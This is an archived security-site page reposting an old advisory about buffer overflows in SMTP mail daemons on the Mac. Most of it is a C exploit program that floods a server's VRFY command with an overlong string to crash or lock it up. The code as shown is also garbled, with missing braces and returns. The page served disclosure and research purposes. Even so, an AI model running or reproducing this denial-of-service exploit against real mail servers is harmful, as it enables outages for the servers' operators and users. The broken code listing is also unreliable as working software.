TUCoPS :: Macintosh :: mdaemon.htm

Mac smtp overflows

    smtp overflows




    Jon Beaton posted following.  There has been more advisories about
    the  buffer  overflows  on  smtp  daemons,  so here's another one.
    After posting about these attacks  on SLMail and Imail, Jon  found
    that there were alot  more that were still  affected.  On the  few
    he tried on the  Mac, like Mercury, it  had locked the server  up,
    much like Appleshare.  Anyways,  this is just mdaemon.c with  just
    a few tiny changes.  This  will also crash IMail, even though  the
    author has said it wasn't affected.

    mdaemon.c with a few small changes.
    known to lock up the whole server with some daemons on the Mac
    Cisc0 @ Undernet

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

     void main(int argc, char *argv[])
       struct sockaddr_in sin;
       struct hostent *hp;
       char *buffer;
       int sock, i;

       if (argc != 2) {
         printf("usage: %s <smtp server>\n", argv[0]);
       hp = gethostbyname(argv[1]);
       if (hp==NULL) {
         printf("Unknown host: %s\n",argv[1]);
       bzero((char*) &sin, sizeof(sin));
       bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
       sin.sin_family = hp->h_addrtype;
       sin.sin_port = htons(25);
       sock = socket(AF_INET, SOCK_STREAM, 0);
       connect(sock,(struct sockaddr *) &sin, sizeof(sin));
       buffer = (char *)malloc(1000);
       sprintf(buffer, "VRFY ");
       for (i = 0; i<896; i++)
         strcat(buffer, "d");
       strcat(buffer, "\r\n");
       write(sock, &buffer[0], strlen(buffer));


    Next releases will hopefully fix this.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH